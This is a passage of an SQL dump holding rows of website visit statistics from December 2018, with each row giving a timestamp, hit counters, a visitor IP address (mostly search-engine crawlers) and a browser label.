1,0,0,'95.163.255.99','other'),(354119,1545081563,1,1,0,0,'54.36.149.48','other'),(354120,1545081631,1,1,0,0,'46.229.168.141','other'),(354121,1545081667,1,1,0,0,'66.249.66.42','chrome'),(354122,1545081696,1,1,0,0,'95.163.255.183','other'),(354123,1545081702,1,1,0,0,'95.163.255.161','other'),(354124,1545081782,1,1,0,0,'54.36.148.61','other'),(354125,1545081842,1,1,0,0,'66.249.66.40','chrome'),(354126,1545081865,5,5,0,0,'66.249.66.156','chrome'),(354127,1545081866,1,1,0,0,'66.249.66.152','chrome'),(354128,1545082083,1,1,0,0,'54.36.148.254','other'),(354129,1545082249,1,1,0,0,'66.249.66.44','chrome'),(354130,1545082357,1,1,0,0,'95.163.255.151','other'),(354131,1545082358,1,1,0,0,'95.163.255.163','other'),(354132,1545082369,1,1,0,0,'95.163.255.156','other'),(354133,1545082371,1,1,0,0,'95.163.255.186','other'),(354134,1545082768,1,1,0,0,'54.36.148.19','other'),(354135,1545083132,1,1,0,0,'54.36.149.7','other'),(354136,1545083303,1,1,0,0,'46.211.68.157','chrome'),(354137,1545083326,1,1,0,0,'66.249.66.152','chrome'),(354138,1545083381,1,1,0,0,'40.77.167.2','other'),(354139,1545083446,1,1,0,0,'54.36.148.116','other'),(354140,1545083642,1,1,0,0,'54.36.148.84','other'),(354141,1545083770,4,4,0,0,'66.249.66.40','chrome'),(354142,1545083810,2,2,0,0,'91.209.11.236','other'),(354143,1545083859,1,1,0,0,'54.36.148.137','other'),(354144,1545083960,1,1,0,0,'54.36.148.11','other'),(354145,1545084147,1,1,0,0,'46.229.168.136','other'),(354146,1545084272,1,1,0,0,'54.36.149.47','other'),(354147,1545084342,1,1,0,0,'54.36.149.85','other'),(354148,1545084472,1,1,0,0,'66.249.66.59','chrome'),(354149,1545084541,1,1,0,0,'207.46.13.49','other'),(354150,1545084715,1,1,0,0,'40.77.167.2','other'),(354151,1545084827,1,1,0,0,'54.36.148.99','other'),(354152,1545084927,1,0,1,0,'66.249.66.40',''),(354153,1545085156,2,2,0,0,'66.249.66.154','chrome'),(354154,1545085182,1,1,0,0,'180.76.15.21','other'),(354155,1545085184,1,1,0,0,'180.76.15.163','other'),(354156,1545085200,2,2,0,0,'34.219.177.115','chrome'),(354157,1545085362,1,1,0,0,'54.36.148.213','other'),(354158,1545085396,1,1,0,0,'66.249.66.44','chrome'),(354159,1545085438,1,1,0,0,'66.249.66.155','chrome'),(354160,1545085439,3,3,0,0,'66.249.66.156','chrome'),(354161,1545085527,1,1,0,0,'54.36.148.232','other'),(354162,1545085549,2,2,0,0,'66.249.66.152','chrome'),(354163,1545085579,1,1,0,0,'54.36.149.64','other'),(354164,1545085584,7,7,0,0,'178.154.244.11','other'),(354165,1545085606,2,2,0,0,'141.8.142.103','other'),(354166,1545085664,4,4,0,0,'5.45.207.19','other'),(354167,1545085695,1,1,0,0,'207.46.13.49','other'),(354168,1545085861,1,1,0,0,'87.250.224.47','other'),(354169,1545085864,1,1,0,0,'37.9.113.148','other'),(354170,1545085882,1,1,0,0,'54.36.148.39','other'),(354171,1545085913,3,3,0,0,'95.108.213.4','other'),(354172,1545086215,8,8,0,0,'5.45.207.79','other'),(354173,1545086463,1,1,0,0,'54.36.148.89','other'),(354174,1545086558,2,2,0,0,'66.249.66.156','chrome'),(354175,1545086693,2,2,0,0,'141.8.142.103','other'),(354176,1545086702,1,1,0,0,'66.249.66.154','chrome'),(354177,1545086725,1,1,0,0,'95.163.255.155','other'),(354178,1545086728,1,1,0,0,'95.163.255.180','other'),(354179,1545086730,1,1,0,0,'54.36.148.56','other'),(354180,1545086777,6,6,0,0,'5.45.207.19','other'),(354181,1545086812,12,12,0,0,'178.154.244.11','other'),(354182,1545086863,1,1,0,0,'54.36.148.79','other'),(354183,1545086996,1,1,0,0,'66.249.66.155','chrome'),(354184,1545086997,2,2,0,0,'66.249.66.152','chrome'),(354185,1545087018,1,1,0,0,'157.55.39.85','other'),(354186,1545087023,1,1,0,0,'54.36.148.234','other'),(354187,1545087109,1,1,0,0,'95.108.213.4','other'),(354188,1545087161,1,1,0,0,'54.36.148.213','other'),(354189,1545087182,1,1,0,0,'180.76.15.24','other'),(354190,1545087277,1,1,0,0,'66.249.66.44','chrome'),(354191,1545087297,8,8,0,0,'5.45.207.79','other'),(354192,1545087454,1,1,0,0,'46.229.168.147','other'),(354193,1545087456,1,1,0,0,'46.229.168.134','other'),(354194,1545087459,1,1,0,0,'46.229.168.137','other'),(354195,1545087501,1,1,0,0,'54.36.149.55','other'),(354196,1545087614,1,1,0,0,'8.29.198.27','other'),(354197,1545087706,2,2,0,0,'5.45.207.19','other'),(354198,1545087764,2,2,0,0,'40.77.167.2','other'),(354199,1545087804,3,3,0,0,'178.154.244.11','other'),(354200,1545087824,2,2,0,0,'66.249.66.156','chrome'),(354201,1545087952,1,1,0,0,'213.180.203.9','other'),(354202,1545087955,1,1,0,0,'8.29.198.25','other'),(354203,1545088111,1,1,0,0,'95.163.255.192','other'),(354204,1545088113,1,1,0,0,'95.163.255.187','other'),(354205,1545088248,2,2,0,0,'37.9.113.20','other'),(354206,1545088307,1,1,0,0,'66.249.66.154','chrome'),(354207,1545088322,2,2,0,0,'130.180.216.136','chrome'),(354208,1545088342,1,1,0,0,'95.163.255.170','other'),(354209,1545088397,1,1,0,0,'95.163.255.163','other'),(354210,1545088472,1,1,0,0,'157.55.39.85','other'),(354211,1545088529,1,1,0,0,'66.249.66.59','chrome'),(354213,1545088562,1,1,0,0,'54.36.149.33','other'),(354214,1545088690,6,6,0,0,'91.242.162.42','other'),(354215,1545088747,2,2,0,0,'66.249.66.152','chrome'),(354216,1545088752,2,2,0,0,'141.8.142.103','other'),(354217,1545088756,1,1,0,0,'54.36.148.33','other'),(354218,1545088803,1,1,0,0,'46.229.168.148','other'),(354219,1545088929,1,1,0,0,'87.250.224.47','other'),(354220,1545088940,1,1,0,0,'95.163.255.99','other'),(354221,1545088943,1,1,0,0,'95.163.255.95','other'),(354222,1545088954,1,1,0,0,'5.45.207.19','other'),(354223,1545089000,1,1,0,0,'54.36.148.173','other'),(354224,1545089025,1,1,0,0,'54.36.148.67','other'),(354225,1545089057,1,1,0,0,'54.36.148.183','other'),(354226,1545089059,1,1,0,0,'5.45.207.79','other'),(354227,1545089133,1,1,0,0,'54.36.148.75','other'),(354228,1545089135,1,1,0,0,'178.154.244.11','other'),(354229,1545089250,1,1,0,0,'54.36.149.9','other'),(354230,1545089366,1,1,0,0,'54.36.148.158','other'),(354231,1545089404,1,1,0,0,'66.249.66.157','chrome'),(354232,1545089405,2,2,0,0,'66.249.66.154','chrome'),(354233,1545089509,1,1,0,0,'54.36.148.137','other'),(354234,1545089689,3,3,0,0,'66.249.66.152','chrome'),(354235,1545089698,5,5,0,0,'91.242.162.42','other'),(354236,1545089869,1,1,0,0,'66.249.66.156','chrome'),(354237,1545089881,1,1,0,0,'54.36.148.209','other'),(354238,1545089893,1,1,0,0,'54.36.149.63','other'),(354239,1545089908,1,1,0,0,'188.165.255.126','other'),(354240,1545090089,1,1,0,0,'66.249.66.61','chrome'),(354241,1545090109,1,1,0,0,'193.93.53.167','firefox'),(354242,1545090307,3,3,0,0,'66.249.66.157','chrome'),(354243,1545090380,2,2,0,0,'66.249.66.154','chrome'),(354244,1545090615,1,1,0,0,'54.36.148.156','other'),(354245,1545090769,1,1,0,0,'141.8.142.103','other'),(354246,1545090780,4,4,0,0,'66.249.66.156','chrome'),(354247,1545090891,2,2,0,0,'66.249.66.152','chrome'),(354248,1545090910,1,1,0,0,'54.36.148.124','other'),(354249,1545090950,3,3,0,0,'91.242.162.42','other'),(354250,1545091046,1,1,0,0,'54.36.148.139','other'),(354251,1545091278,1,1,0,0,'46.229.168.151','other'),(354252,1545091459,1,1,0,0,'95.108.213.4','other'),(354253,1545091576,1,1,0,0,'54.36.148.172','other'),(354254,1545091862,1,1,0,0,'54.36.148.126','other'),(354255,1545091878,1,1,0,0,'66.249.66.57','chrome'),(354257,1545091946,4,4,0,0,'91.242.162.42','other'),(354258,1545092230,2,2,0,0,'66.249.66.42','chrome'),(354259,1545092260,1,1,0,0,'95.163.255.97','other'),(354260,1545092264,1,1,0,0,'95.163.255.92','other'),(354261,1545092403,1,1,0,0,'54.36.148.28','other'),(354262,1545092717,1,1,0,0,'54.36.148.214','other'),(354263,1545092728,2,2,0,0,'95.163.255.94','other'),(354264,1545092738,1,1,0,0,'66.249.66.156','chrome'),(354265,1545093002,4,4,0,0,'91.242.162.42','other'),(354266,1545093342,1,1,0,0,'66.249.66.42','chrome'),(354267,1545093503,2,2,0,0,'66.249.66.152','chrome'),(354268,1545093556,2,2,0,0,'66.249.66.154','chrome'),(354269,1545093585,1,1,0,0,'46.229.168.132','other'),(354270,1545093687,1,1,0,0,'54.36.148.18','other'),(354271,1545093798,2,2,0,0,'95.163.255.159','other'),(354272,1545093801,1,1,0,0,'95.163.255.168','other'),(354273,1545093843,1,1,0,0,'207.46.13.49','other'),(354274,1545093872,1,1,0,0,'54.36.148.242','other'),(354275,1545093939,4,4,0,0,'91.242.162.42','other'),(354276,1545094026,2,2,0,0,'66.249.66.156','chrome'),(354277,1545094057,1,1,0,0,'66.249.66.155','chrome'),(354278,1545094227,1,1,0,0,'54.36.148.183','other'),(354279,1545094469,1,1,0,0,'95.163.255.196','other'),(354280,1545094522,1,1,0,0,'31.220.0.225','other'),(354281,1545094538,1,1,0,0,'54.36.149.105','other'),(354282,1545094545,2,2,0,0,'66.249.66.152','chrome'),(354283,1545094553,1,1,0,0,'66.249.66.40','chrome'),(354284,1545094576,1,1,0,0,'95.163.255.97','other'),(354285,1545094581,1,1,0,0,'95.163.255.98','other'),(354286,1545094588,1,1,0,0,'157.55.39.85','other'),(354287,1545094589,2,2,0,0,'66.249.66.157','chrome'),(354288,1545094740,1,1,0,0,'40.77.167.2','other'),(354289,1545094852,1,1,0,0,'54.36.148.146','other'),(354290,1545094928,5,5,0,0,'91.242.162.42','other'),(354291,1545095267,1,1,0,0,'66.249.66.154','chrome'),(354292,1545095399,1,1,0,0,'54.36.149.29','other'),(354293,1545095512,1,1,0,0,'66.249.66.156','chrome'),(354294,1545095588,1,1,0,0,'54.36.148.25','other'),(354295,1545095691,1,1,0,0,'54.36.148.100','other'),(354296,1545095705,2,2,0,0,'66.249.66.152','chrome'),(354297,1545095760,1,1,0,0,'66.249.66.40','chrome'),(354298,1545095931,3,3,0,0,'91.242.162.42','other'),(354299,1545095961,1,1,0,0,'54.36.149.59','other'),(354300,1545096002,1,1,0,0,'54.36.148.86','other'),(354301,1545096452,1,1,0,0,'46.229.168.134','other'),(354302,1545096454,1,1,0,0,'46.229.168.144','other'),(354303,1545096525,5,5,0,0,'66.249.66.156','chrome'),(354304,1545096535,1,1,0,0,'157.55.39.108','other'),(354305,1545096549,1,1,0,0,'66.249.66.157','chrome'),(354306,1545096582,1,1,0,0,'5.45.207.79','other'),(354307,1545096665,1,1,0,0,'157.55.39.85','other'),(354308,1545096669,1,1,0,0,'54.36.148.194','other'),(354309,1545096782,1,1,0,0,'66.249.66.152','chrome'),(354310,1545096884,1,1,0,0,'91.242.162.42','other'),(354311,1545096888,1,1,0,0,'46.229.168.141','other'),(354312,1545097054,1,1,0,0,'209.17.97.50','other'),(354313,1545097188,1,1,0,0,'40.77.167.2','other'),(354314,1545097262,1,1,0,0,'54.36.148.29','other'),(354315,1545097375,1,1,0,0,'54.36.148.253','other'),(354316,1545097486,1,1,0,0,'54.36.149.79','other'),(354317,1545097500,1,1,0,0,'178.154.244.49','other'),(354318,1545097508,1,1,0,0,'141.8.132.16','other'),(354319,1545097514,1,1,0,0,'46.229.168.136','other'),(354320,1545097542,1,1,0,0,'141.8.142.103','other'),(354321,1545097630,1,1,0,0,'37.9.113.103','other'),(354322,1545097645,1,1,0,0,'95.108.181.54','other'),(354323,1545097669,1,1,0,0,'54.36.149.61','other'),(354324,1545097755,1,1,0,0,'178.154.171.24','other'),(354325,1545097829,1,1,0,0,'54.36.149.17','other'),(354326,1545097830,1,1,0,0,'54.36.148.18','other'),(354327,1545097858,1,1,0,0,'54.36.149.33','other'),(354328,1545097906,1,1,0,0,'54.36.149.102','other'),(354329,1545097929,1,1,0,0,'66.249.66.156','chrome'),(354330,1545098197,2,2,0,0,'66.249.66.157','chrome'),(354331,1545098198,1,1,0,0,'54.36.148.216','other'),(354332,1545098199,1,1,0,0,'66.249.66.152','chrome'),(354333,1545098224,1,1,0,0,'193.238.46.254','chrome'),(354334,1545098340,1,1,0,0,'95.163.255.97','other'),(354335,1545098342,1,1,0,0,'95.163.255.98','other'),(354336,1545098389,3,3,0,0,'178.154.244.11','other'),(354337,1545098446,4,4,0,0,'5.45.207.79','other'),(354338,1545098458,1,1,0,0,'8.29.198.25','other'),(354339,1545098541,1,1,0,0,'46.229.168.152','other'),(354340,1545098573,1,1,0,0,'54.36.148.213','other'),(354341,1545098615,2,2,0,0,'5.45.207.19','other'),(354342,1545098644,3,3,0,0,'141.8.142.103','other'),(354343,1545098649,1,1,0,0,'95.163.255.195','other'),(354344,1545098650,1,1,0,0,'95.163.255.194','other'),(354345,1545098654,2,2,0,0,'95.163.255.186','other'),(354346,1545098688,2,2,0,0,'66.249.66.154','chrome'),(354347,1545098793,1,1,0,0,'8.29.198.27','other'),(354348,1545098997,1,1,0,0,'87.250.224.47','other'),(354349,1545099008,1,1,0,0,'37.9.113.20','other'),(354350,1545099009,1,1,0,0,'141.8.142.191','other'),(354351,1545099040,1,1,0,0,'66.249.66.155','chrome'),(354352,1545099243,1,1,0,0,'213.180.203.9','other'),(354353,1545099277,1,1,0,0,'87.250.224.64','other'),(354354,1545099287,1,1,0,0,'5.255.253.38','other'),(354355,1545099444,1,1,0,0,'54.36.148.64','other'),(354356,1545099486,2,2,0,0,'37.9.113.148','other'),(354357,1545099556,1,1,0,0,'180.76.15.34','other'),(354358,1545099557,1,1,0,0,'180.76.15.145','other'),(354359,1545099632,3,3,0,0,'5.45.207.79','other'),(354360,1545099825,1,1,0,0,'54.36.148.122','other'),(354361,1545099985,2,2,0,0,'66.249.66.156','chrome'),(354362,1545100053,2,2,0,0,'66.249.66.154','chrome'),(354363,1545100101,2,2,0,0,'5.45.207.19','other'),(354364,1545100103,1,1,0,0,'93.158.166.7','other'),(354365,1545100178,1,1,0,0,'95.163.255.93','other'),(354366,1545100180,1,1,0,0,'95.163.255.99','other'),(354367,1545100215,1,1,0,0,'141.8.142.103','other'),(354368,1545100338,1,1,0,0,'54.36.148.134','other'),(354369,1545100610,1,1,0,0,'54.36.148.130','other'),(354370,1545100615,1,1,0,0,'54.36.148.240','other'),(354371,1545100790,1,1,0,0,'40.77.167.83','other'),(354372,1545100841,1,1,0,0,'54.36.149.87','other'),(354373,1545101536,1,1,0,0,'141.8.142.103','other'),(354374,1545102247,1,1,0,0,'54.36.148.228','other'),(354375,1545102334,1,1,0,0,'54.36.148.124','other'),(354376,1545102344,1,1,0,0,'5.45.207.19','other'),(354377,1545102744,1,1,0,0,'95.163.255.116','other'),(354378,1545102814,1,1,0,0,'54.36.149.82','other'),(354379,1545102999,1,1,0,0,'46.229.168.142','other'),(354380,1545103159,1,1,0,0,'54.36.148.34','other'),(354381,1545103275,1,1,0,0,'95.163.255.109','other'),(354382,1545103310,1,1,0,0,'66.249.66.156','chrome'),(354383,1545103332,1,1,0,0,'66.249.66.152','chrome'),(354384,1545103442,1,1,0,0,'54.36.148.179','other'),(354385,1545103733,1,1,0,0,'54.36.148.226','other'),(354386,1545103820,1,1,0,0,'40.77.167.83','other'),(354387,1545103860,4,4,0,0,'66.249.66.154','chrome'),(354388,1545103906,1,1,0,0,'95.163.255.93','other'),(354389,1545103908,1,1,0,0,'95.163.255.97','other'),(354390,1545103926,1,1,0,0,'54.36.148.108','other'),(354391,1545104004,3,3,0,0,'66.249.66.157','chrome'),(354392,1545104054,2,2,0,0,'66.249.66.44','chrome'),(354393,1545104081,1,1,0,0,'54.36.149.58','other'),(354394,1545104190,1,1,0,0,'66.249.66.42','chrome'),(354395,1545104339,2,2,0,0,'122.228.19.80','firefox'),(354396,1545104375,2,2,0,0,'66.249.66.152','chrome'),(354397,1545104381,1,1,0,0,'157.55.39.85','other'),(354398,1545104414,3,3,0,0,'66.249.66.156','chrome'),(354399,1545104419,1,1,0,0,'54.36.148.17','other'),(354400,1545104695,1,1,0,0,'54.36.148.165','other'),(354401,1545105090,1,1,0,0,'40.77.167.120','other'),(354402,1545105218,1,1,0,0,'46.229.168.144','other'),(354403,1545105220,1,1,0,0,'46.229.168.137','other'),(354404,1545105359,1,1,0,0,'54.36.148.81','other'),(354405,1545105452,1,1,0,0,'54.36.148.234','other'),(354406,1545105671,3,3,0,0,'66.249.66.156','chrome'),(354407,1545105684,1,1,0,0,'95.163.255.97','other'),(354408,1545105686,1,1,0,0,'95.163.255.94','other'),(354409,1545105766,1,1,0,0,'66.249.66.157','chrome'),(354411,1545105854,1,1,0,0,'66.249.66.154','chrome'),(354412,1545105965,1,1,0,0,'95.163.255.165','other'),(354413,1545105966,1,1,0,0,'95.163.255.185','other'),(354414,1545105973,1,1,0,0,'95.163.255.183','other'),(354415,1545105975,1,1,0,0,'95.163.255.150','other'),(354416,1545106158,1,1,0,0,'37.112.23.18','chrome'),(354417,1545106173,1,1,0,0,'95.163.255.107','other'),(354418,1545106194,1,1,0,0,'95.163.255.117','other'),(354419,1545106234,1,1,0,0,'109.201.138.227','other'),(354420,1545106298,1,1,0,0,'54.36.148.64','other'),(354421,1545106606,1,1,0,0,'54.36.148.240','other'),(354422,1545106692,1,1,0,0,'5.45.207.19','other'),(354423,1545106786,1,1,0,0,'54.36.148.243','other'),(354424,1545106807,1,1,0,0,'54.36.148.49','other'),(354425,1545106808,1,1,0,0,'54.36.148.132','other'),(354426,1545106884,1,1,0,0,'66.249.66.44','chrome'),(354427,1545107242,2,2,0,0,'157.55.39.85','other'),(354428,1545107274,1,1,0,0,'157.55.39.108','other'),(354429,1545107434,1,1,0,0,'66.249.66.154','chrome'),(354430,1545108346,1,1,0,0,'54.36.149.55','other'),(354431,1545108610,1,1,0,0,'207.46.13.89','other'),(354432,1545108628,4,4,0,0,'66.249.66.154','chrome'),(354433,1545108650,1,1,0,0,'54.36.148.209','other'),(354434,1545108657,1,1,0,0,'54.36.148.92','other'),(354435,1545108706,1,1,0,0,'46.229.168.134','other'),(354436,1545108975,1,1,0,0,'66.249.66.155','chrome'),(354437,1545109046,1,1,0,0,'54.36.148.79','other'),(354438,1545109117,1,1,0,0,'207.46.13.51','other'),(354439,1545109204,1,1,0,0,'40.77.167.114','other'),(354440,1545109226,1,1,0,0,'157.55.39.162','other'),(354441,1545109253,1,1,0,0,'54.36.148.136','other'),(354442,1545109290,2,2,0,0,'87.250.224.47','other'),(354443,1545109301,1,1,0,0,'8.29.198.27','other'),(354444,1545109404,1,1,0,0,'66.249.66.156','chrome'),(354445,1545109453,1,1,0,0,'141.8.183.23','other'),(354446,1545109456,1,1,0,0,'46.229.168.141','other'),(354447,1545109459,1,1,0,0,'95.163.255.97','other'),(354448,1545109462,1,1,0,0,'95.163.255.92','other'),(354449,1545109541,2,2,0,0,'157.55.13.64','other'),(354450,1545109633,1,1,0,0,'8.29.198.26','other'),(354451,1545109806,2,2,0,0,'66.249.66.154','chrome'),(354452,1545109985,1,1,0,0,'54.36.148.119','other'),(354453,1545109992,1,1,0,0,'66.249.66.59','chrome'),(354455,1545110029,2,2,0,0,'66.249.66.42','chrome'),(354456,1545110156,1,1,0,0,'178.154.244.11','other'),(354457,1545110256,1,1,0,0,'54.36.149.43','other'),(354458,1545110403,4,4,0,0,'66.249.66.156','chrome'),(354459,1545110404,1,1,0,0,'66.249.66.152','chrome'),(354460,1545110870,1,1,0,0,'54.36.148.25','other'),(354461,1545110877,1,1,0,0,'66.249.66.157','chrome'),(354462,1545111286,1,1,0,0,'54.36.149.18','other'),(354463,1545111354,2,2,0,0,'66.249.66.156','chrome'),(354464,1545111361,1,1,0,0,'54.36.148.248','other'),(354465,1545111538,1,1,0,0,'178.154.244.11','other'),(354466,1545111613,1,1,0,0,'66.249.66.154','chrome'),(354467,1545111654,1,1,0,0,'207.46.13.51','other'),(354468,1545111682,1,1,0,0,'40.77.167.48','other'),(354469,1545112050,1,1,0,0,'54.36.149.98','other'),(354470,1545112118,1,1,0,0,'46.229.168.130','other'),(354471,1545112284,1,1,0,0,'66.249.66.42','chrome'),(354472,1545112561,1,1,0,0,'40.77.167.114','other'),(354473,1545112735,1,1,0,0,'54.36.149.38','other'),(354474,1545112837,1,1,0,0,'66.249.66.156','chrome'),(354475,1545113449,1,1,0,0,'54.36.148.90','other'),(354476,1545113528,2,2,0,0,'66.249.66.152','chrome'),(354477,1545113729,1,1,0,0,'66.249.66.155','chrome'),(354478,1545113847,1,1,0,0,'46.229.168.133','other'),(354479,1545113862,1,1,0,0,'54.36.149.60','other'),(354480,1545114198,1,1,0,0,'66.249.66.154','chrome'),(354481,1545114304,1,1,0,0,'66.249.66.156','chrome'),(354482,1545114365,1,1,0,0,'40.77.167.65','other'),(354483,1545114395,1,1,0,0,'54.36.149.6','other'),(354484,1545114517,1,1,0,0,'54.36.148.190','other'),(354485,1545114567,1,1,0,0,'66.249.66.152','chrome'),(354486,1545114812,1,1,0,0,'95.163.255.93','other'),(354487,1545114815,1,1,0,0,'95.163.255.95','other'),(354488,1545114909,1,1,0,0,'95.163.255.99','other'),(354489,1545114911,1,1,0,0,'95.163.255.96','other'),(354490,1545114932,5,5,0,0,'91.196.178.67','chrome'),(354491,1545115149,2,2,0,0,'95.163.255.115','other'),(354492,1545115169,1,1,0,0,'95.163.255.105','other'),(354493,1545115178,1,1,0,0,'95.163.255.109','other'),(354494,1545115189,1,1,0,0,'95.163.255.103','other'),(354495,1545115197,1,1,0,0,'95.163.255.107','other'),(354496,1545115256,2,2,0,0,'66.249.66.156','chrome'),(354497,1545115279,1,1,0,0,'95.163.255.97','other'),(354498,1545115284,1,1,0,0,'95.163.255.94','other'),(354499,1545115653,1,1,0,0,'91.196.179.134','chrome'),(354500,1545116002,1,1,0,0,'91.196.178.168','chrome'),(354501,1545116161,1,1,0,0,'54.36.149.1','other'),(354502,1545116596,1,1,0,0,'54.36.148.34','other'),(354503,1545116637,1,1,0,0,'66.249.66.152','chrome'),(354504,1545116677,2,2,0,0,'54.212.4.221','chrome'),(354505,1545117082,1,1,0,0,'40.77.167.60','other'),(354506,1545117154,1,1,0,0,'54.36.148.234','other'),(354507,1545117181,1,1,0,0,'46.149.50.25','chrome'),(354508,1545117324,1,1,0,0,'54.36.149.31','other'),(354509,1545117328,2,2,0,0,'66.249.66.154','chrome'),(354510,1545117330,1,1,0,0,'95.163.255.118','other'),(354511,1545117353,1,1,0,0,'95.163.255.112','other'),(354512,1545117673,2,2,0,0,'91.196.178.67','chrome'),(354513,1545117783,1,1,0,0,'40.77.167.114','other'),(354514,1545117947,2,2,0,0,'77.111.244.129','chrome'),(354515,1545117968,1,1,0,0,'94.180.157.58','msie'),(354516,1545117969,1,1,0,0,'176.193.125.174','msie'),(354517,1545118020,1,1,0,0,'66.249.66.152','chrome'),(354518,1545118061,1,1,0,0,'66.249.66.155','chrome'),(354519,1545118306,1,1,0,0,'178.95.49.66','chrome'),(354520,1545118308,1,1,0,0,'40.77.167.60','other'),(354521,1545118575,1,1,0,0,'40.77.167.65','other'),(354522,1545118737,1,1,0,0,'54.36.148.176','other'),(354523,1545119081,1,1,0,0,'91.196.178.168','chrome'),(354524,1545119192,1,1,0,0,'13.66.139.0','other'),(354525,1545119298,1,1,0,0,'66.249.66.220','chrome'),(354526,1545119322,2,2,0,0,'66.249.66.154','chrome'),(354527,1545119344,2,2,0,0,'66.249.66.156','chrome'),(354528,1545119346,1,1,0,0,'54.36.149.28','other'),(354529,1545119524,2,2,0,0,'66.249.66.152','chrome'),(354530,1545119740,1,1,0,0,'54.36.148.152','other'),(354531,1545119777,1,1,0,0,'66.249.66.157','chrome'),(354532,1545119786,1,1,0,0,'54.36.148.183','other'),(354533,1545119851,2,2,0,0,'178.154.244.11','other'),(354534,1545120009,1,1,0,0,'37.115.204.75','chrome'),(354535,1545120122,1,1,0,0,'91.196.178.134','chrome'),(354536,1545120142,1,1,0,0,'8.29.198.27','other'),(354537,1545120144,60,60,0,0,'178.151.245.174','other'),(354538,1545120284,1,1,0,0,'141.8.142.103','other'),(354539,1545120389,1,1,0,0,'46.229.168.136','other'),(354540,1545120428,1,1,0,0,'37.53.73.6','chrome'),(354541,1545120439,3,3,0,0,'66.249.66.152','chrome'),(354542,1545120475,1,1,0,0,'8.29.198.26','other'),(354543,1545120575,1,1,0,0,'91.196.178.182','firefox'),(354544,1545120629,1,1,0,0,'141.8.142.38','other'),(354545,1545120796,1,1,0,0,'54.36.148.235','other'),(354546,1545120821,1,1,0,0,'5.255.253.38','other'),(354547,1545120844,1,1,0,0,'178.154.244.11','other'),(354548,1545120854,1,1,0,0,'5.45.207.79','other'),(354549,1545121036,2,2,0,0,'212.1.101.82','chrome'),(354550,1545121184,1,1,0,0,'213.180.203.40','other'),(354551,1545121241,1,1,0,0,'54.36.148.80','other'),(354552,1545121331,2,2,0,0,'5.9.152.73','other'),(354553,1545121513,1,1,0,0,'54.36.148.18','other'),(354554,1545121623,1,1,0,0,'66.249.66.155','chrome'),(354556,1545121819,1,1,0,0,'66.249.66.154','chrome'),(354557,1545121860,1,1,0,0,'40.77.167.60','other'),(354558,1545121909,1,1,0,0,'54.36.148.115','other'),(354559,1545122010,2,2,0,0,'37.57.111.113','firefox'),(354560,1545122031,1,1,0,0,'46.101.89.227','chrome'),(354561,1545122041,1,1,0,0,'95.108.213.4','other'),(354562,1545122094,1,1,0,0,'178.154.171.27','other'),(354563,1545122253,2,2,0,0,'176.105.203.154','chrome'),(354564,1545122299,1,1,0,0,'66.102.9.62','chrome'),(354565,1545122303,2,2,0,0,'5.45.207.19','other'),(354566,1545122310,1,1,0,0,'91.196.178.168','chrome'),(354567,1545122510,2,2,0,0,'66.249.66.152','chrome'),(354568,1545122625,1,1,0,0,'5.45.207.79','other'),(354569,1545122783,1,1,0,0,'178.154.244.11','other'),(354570,1545122823,2,2,0,0,'91.196.178.169','chrome'),(354571,1545123079,2,2,0,0,'66.249.66.156','chrome'),(354572,1545123136,1,1,0,0,'54.36.148.89','other'),(354573,1545123228,1,1,0,0,'80.248.227.208','other'),(354574,1545123388,1,1,0,0,'87.250.224.47','other'),(354575,1545123427,1,1,0,0,'141.8.142.108','other'),(354576,1545123587,1,1,0,0,'46.201.244.177','opera'),(354577,1545123883,1,1,0,0,'178.154.244.11','other'),(354578,1545123959,1,1,0,0,'54.36.149.32','other'),(354579,1545124114,3,3,0,0,'40.77.167.60','other'),(354580,1545124137,1,1,0,0,'207.46.13.104','other'),(354581,1545124173,1,1,0,0,'54.36.148.151','other'),(354582,1545124238,2,2,0,0,'66.249.66.152','chrome'),(354583,1545124251,1,1,0,0,'54.36.148.195','other'),(354584,1545124252,1,1,0,0,'54.36.148.54','other'),(354585,1545124417,1,1,0,0,'141.8.142.103','other'),(354586,1545125159,2,2,0,0,'91.196.178.67','chrome'),(354587,1545125194,1,1,0,0,'54.36.149.79','other'),(354588,1545125256,1,1,0,0,'54.36.148.85','other'),(354589,1545125274,1,1,0,0,'66.249.66.152','chrome'),(354590,1545125358,1,1,0,0,'66.249.66.218','chrome'),(354591,1545125366,1,1,0,0,'54.36.148.130','other'),(354592,1545125409,2,2,0,0,'66.249.66.154','chrome'),(354593,1545125437,2,2,0,0,'31.43.31.39','chrome'),(354594,1545125567,1,1,0,0,'54.36.149.34','other'),(354595,1545126089,1,1,0,0,'54.36.149.90','other'),(354596,1545126148,1,1,0,0,'66.249.66.57','chrome'),(354597,1545126226,1,1,0,0,'5.45.207.79','other'),(354598,1545126250,2,2,0,0,'66.249.66.156','chrome'),(354599,1545126251,1,1,0,0,'66.249.66.152','chrome'),(354600,1545126269,1,1,0,0,'109.227.71.158','chrome'),(354601,1545126475,1,1,0,0,'95.163.255.95','other'),(354602,1545126479,1,1,0,0,'95.163.255.97','other'),(354603,1545126484,1,1,0,0,'54.36.149.58','other'),(354604,1545126668,1,1,0,0,'54.36.148.71','other'),(354605,1545126701,1,1,0,0,'66.249.66.218','chrome'),(354606,1545126729,1,1,0,0,'54.36.148.122','other'),(354607,1545127189,1,1,0,0,'54.36.148.244','other'),(354608,1545127303,1,1,0,0,'66.249.66.156','chrome'),(354609,1545127320,1,1,0,0,'5.45.207.19','other'),(354610,1545127855,1,1,0,0,'95.163.255.92','other'),(354611,1545128278,1,1,0,0,'5.45.207.19','other'),(354612,1545128349,1,1,0,0,'209.17.96.50','other'),(354613,1545128787,1,1,0,0,'46.229.168.146','other'),(354614,1545128790,1,1,0,0,'46.229.168.143','other'),(354615,1545128871,1,1,0,0,'54.36.148.141','other'),(354616,1545128947,1,1,0,0,'109.173.40.29','msie'),(354617,1545128949,1,1,0,0,'54.36.149.106','other'),(354618,1545129065,1,1,0,0,'54.36.148.48','other'),(354619,1545129341,1,1,0,0,'54.36.148.150','other'),(354620,1545129485,1,1,0,0,'91.196.178.168','chrome'),(354621,1545129570,5,5,0,0,'91.196.178.78','chrome'),(354622,1545129572,1,1,0,0,'66.249.66.156','chrome'),(354623,1545129574,1,1,0,0,'66.249.66.154','chrome'),(354624,1545129611,1,1,0,0,'54.36.148.217','other'),(354625,1545129787,2,2,0,0,'95.134.211.7','chrome'),(354626,1545129996,1,1,0,0,'66.249.66.155','chrome'),(354627,1545130212,1,1,0,0,'157.55.39.162','other'),(354628,1545130242,2,2,0,0,'207.46.13.52','other'),(354629,1545130400,1,1,0,0,'54.36.148.244','other'),(354630,1545130419,1,